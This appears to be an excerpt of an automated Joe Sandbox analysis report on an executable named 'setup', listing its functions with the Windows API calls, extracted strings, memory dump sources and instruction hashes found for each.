                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 1807155316-3261393531
                                                                                                                                                                              • Opcode ID: 94b2c0d7e2a540ac4cfeb7eb02aa572c2a4a6e036cda64fc291725301807f59b
                                                                                                                                                                              • Instruction ID: afc1d3652ff6dadc7831b21c2e34cfc279fcfa943d5c2c912c6b9675cca857ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 94b2c0d7e2a540ac4cfeb7eb02aa572c2a4a6e036cda64fc291725301807f59b
                                                                                                                                                                              • Instruction Fuzzy Hash: 70B14A70900249DFDB10DBA5D888BFEBBF4EF09314F248599E405AB291DBB5A948CB61
                                                                                                                                                                              Function 00CC95B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 238registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,02141699,02141699,?,?), ref: 00CC9806
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CC9816
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00CC9868
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-3913318428
                                                                                                                                                                              • Opcode ID: 020efa85b98e36c978e656ce1aa089fe6f32ed11c373165b4d58c4278861eee0
                                                                                                                                                                              • Instruction ID: 46152b0189652b9ce2b97b76fb6270d0189884d116b7b441e7182326b50d6893
                                                                                                                                                                              • Opcode Fuzzy Hash: 020efa85b98e36c978e656ce1aa089fe6f32ed11c373165b4d58c4278861eee0
                                                                                                                                                                              • Instruction Fuzzy Hash: BDA15B70D04208DFDB24CF68C959B9EBBF4FF49304F20826DE455AB291DB74AA44CBA1
                                                                                                                                                                              Function 00BB1000 Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00BB10F4
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB1169
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?), ref: 00BB11D9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00BB11DF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,02141699), ref: 00BB120C
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,02141699), ref: 00BB1212
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB122A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$Heap$String$Process
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2680101141-0
                                                                                                                                                                              • Opcode ID: 86587ea2c59030694585718e7e88ae18219561a8913e7d1c139ffa63a226ffa7
                                                                                                                                                                              • Instruction ID: 28887522562c4f1d8f4047930e1785b57de7a1e222eb5bac31a5d017fd6c25dc
                                                                                                                                                                              • Opcode Fuzzy Hash: 86587ea2c59030694585718e7e88ae18219561a8913e7d1c139ffa63a226ffa7
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C813570D012599FDF10DFA8C954BEEBBF8EF05310F644999E510BB281D7B89A04CBA1
                                                                                                                                                                              Function 00BB8400 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 194comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.COMBASE(00E195AC,00000000,00000001,Function_00279C34,?), ref: 00BB84D0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                              • String ID: :${
                                                                                                                                                                              • API String ID: 542301482-3766677574
                                                                                                                                                                              • Opcode ID: 47453f81e4585845197dc8bcf968855bd6f884b926fc26cf176e0076520c6c1e
                                                                                                                                                                              • Instruction ID: a7f19bccd971bf43672cde2e9f2a6dfa63588c38322cf3fd471d6dd09a9c1a11
                                                                                                                                                                              • Opcode Fuzzy Hash: 47453f81e4585845197dc8bcf968855bd6f884b926fc26cf176e0076520c6c1e
                                                                                                                                                                              • Instruction Fuzzy Hash: 8661B274A002169BCF299F54C894BFDB7F8EB09714F1444AAE902FB281EBB5DD40CB60
                                                                                                                                                                              Function 00CCB9D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00DE871D,000000FF,?,00CCBCE6,?), ref: 00CCBA73
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,02141699,?,?,?,?,00DE871D,000000FF,?,00CCBCE6,?,00000000), ref: 00CCBAA2
                                                                                                                                                                              • GetLastError.KERNEL32(?,02141699,?,?,?,?,00DE871D,000000FF,?,00CCBCE6,?,00000000), ref: 00CCBAB2
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,00DE871D,000000FF,?,80004005,02141699,?), ref: 00CCBB83
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,74DF3220), ref: 00CCBBC2
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DirectoryErrorInit_thread_footerLastRemove$DeleteFileFindHeapProcessResource
                                                                                                                                                                              • String ID: \\?\
                                                                                                                                                                              • API String ID: 34920479-4282027825
                                                                                                                                                                              • Opcode ID: 4ad9993a82baabb19e364664e0a9bddc074e6ad0b446e5e98b2c98bdccefe260
                                                                                                                                                                              • Instruction ID: 2accdeee6b4dd87964ad78f93b425bf93c1062c9105fd1736b64573f65367cc0
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ad9993a82baabb19e364664e0a9bddc074e6ad0b446e5e98b2c98bdccefe260
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B51AE71A046089FDB10EFA9C856FAAB7E8EF05321F20465DE8A1D7290DB359D44DB60
                                                                                                                                                                              Function 00BB9BD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,00EA69B8), ref: 00BB9C43
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9CA8
                                                                                                                                                                              • LoadCursorW.USER32(00BA0000,?), ref: 00BB9D04
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9D9B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                                                                              • String ID: v$ATL:%p
                                                                                                                                                                              • API String ID: 2080323225-109518622
                                                                                                                                                                              • Opcode ID: 02eef52ec52527f51f7e88a20dd125d1eb0910c81e8536910d0224578e749a41
                                                                                                                                                                              • Instruction ID: 2dbce08e59c4c7bf63173a76080c84b94452ffe40c5c9af82addf93aec82cf0e
                                                                                                                                                                              • Opcode Fuzzy Hash: 02eef52ec52527f51f7e88a20dd125d1eb0910c81e8536910d0224578e749a41
                                                                                                                                                                              • Instruction Fuzzy Hash: C551BC71D00B44DFDB20CF69C9406AABBF0FF59320F04465EE995A3691E7B1B984CB90
                                                                                                                                                                              Function 00BB2510 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB2592
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB25DA
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00E9CAB0,00000000,?,?,02141699,?), ref: 00BB2617
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionCreateDirectoryVariableWake
                                                                                                                                                                              • String ID: xi$xi$xi
                                                                                                                                                                              • API String ID: 2312781895-3608368268
                                                                                                                                                                              • Opcode ID: e0532a7b027b1c4f603d7a02481810db2d180992c8f066e4e1633b88001c4e8c
                                                                                                                                                                              • Instruction ID: f795e41ddb63a13905f1eb0a06442b42f7b237a49cbeaebb1ecf92225c37101a
                                                                                                                                                                              • Opcode Fuzzy Hash: e0532a7b027b1c4f603d7a02481810db2d180992c8f066e4e1633b88001c4e8c
                                                                                                                                                                              • Instruction Fuzzy Hash: 48419471D00308DFCB10EBA4D945BEEB7F4EB5A710F1442A9E452BB2D1DB706A08CB61
                                                                                                                                                                              Function 00D99953 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00D99A60,?,000000FF,-00000010,00000000,?,?,00D99CCA,00000021,FlsSetValue,00E10E8C,00E10E94,-00000010,00000000), ref: 00D99A14
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                              • Opcode ID: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
                                                                                                                                                                              • Instruction ID: ef2c0dd3f0ead0a7103a7dec309161b74bad36725dab0f7157c1890de3aead67
                                                                                                                                                                              • Opcode Fuzzy Hash: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
                                                                                                                                                                              • Instruction Fuzzy Hash: AA21EB31A01210BFDF219B69DC91A5AB768EB927A0F28121DFD06B72D1D730ED44CAF0
                                                                                                                                                                              Function 00D7D03D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D7D0B8,00D7D01B,00D7D2BC), ref: 00D7D054
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D7D06A
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D7D07F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                              • API String ID: 667068680-1718035505
                                                                                                                                                                              • Opcode ID: 6f4bbd874afdff8181cdeb273a359128944e5f841d505f8a8243db662ca48ae5
                                                                                                                                                                              • Instruction ID: 6ed1085fe6b0242c828318dc5091343e24a837a1256b65ba1e18263efc3f2e80
                                                                                                                                                                              • Opcode Fuzzy Hash: 6f4bbd874afdff8181cdeb273a359128944e5f841d505f8a8243db662ca48ae5
                                                                                                                                                                              • Instruction Fuzzy Hash: 69F0C8313443119F9B315F615C8166733AA6F45715B28E23AD90DF3690FA61CC8AD6F0
                                                                                                                                                                              Function 00BDF330 Relevance: 9.2, APIs: 6, Instructions: 153COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF37A
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF39C
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF3C4
                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00BDF4A5
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF507
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                                                              • Opcode ID: 8a5d7808b54a524818c89571efa677a1bce8ea2c3ccc353d2fdc76e158870272
                                                                                                                                                                              • Instruction ID: 3dbd766872f2bf1ed5ec0e48003d6db5166e8a82deb08e558ec9e640d098862d
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a5d7808b54a524818c89571efa677a1bce8ea2c3ccc353d2fdc76e158870272
                                                                                                                                                                              • Instruction Fuzzy Hash: 17619271D04249CFDB11DF58D9417AEFBF0EF14320F1482AAD845AB391E774AA84CBA1
                                                                                                                                                                              Function 00BDF130 Relevance: 9.1, APIs: 6, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF16D
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF18F
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF1B7
                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00BDF281
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF2C6
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF2FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1184649410-0
                                                                                                                                                                              • Opcode ID: c5fdb43e6de32f0839ed80511b9e057c35a7eeeca5fab43f6aca6be1ab21f435
                                                                                                                                                                              • Instruction ID: bd193a6b6d8c4e7296ef6502dee4ac2722e66534b835cd4e6df04399ed423e16
                                                                                                                                                                              • Opcode Fuzzy Hash: c5fdb43e6de32f0839ed80511b9e057c35a7eeeca5fab43f6aca6be1ab21f435
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A518C71904249DFCB11DF98D880BADFBF0EF55314F2481AAE8167B381E7746A05CB90
                                                                                                                                                                              Function 00D042B0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID: */*$FTP Server$GET$HTTP/1.0$Local Network Server
                                                                                                                                                                              • API String ID: 1452528299-1822174798
                                                                                                                                                                              • Opcode ID: 052560742288933b4f09c7a3b72444c36608448d3e7d4acd2e624f821ceff58c
                                                                                                                                                                              • Instruction ID: 2f7a9317fcb66962956c6c61dbd82a3318f4b06d81b900d14cc197dd749cda96
                                                                                                                                                                              • Opcode Fuzzy Hash: 052560742288933b4f09c7a3b72444c36608448d3e7d4acd2e624f821ceff58c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D41D4B1900209ABDB10EFA9CC45FAEB7F8EF05710F14452AEA15E72C1DB749905CBB1
                                                                                                                                                                              Function 00D819D3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D819E1
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D819EF
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81A08
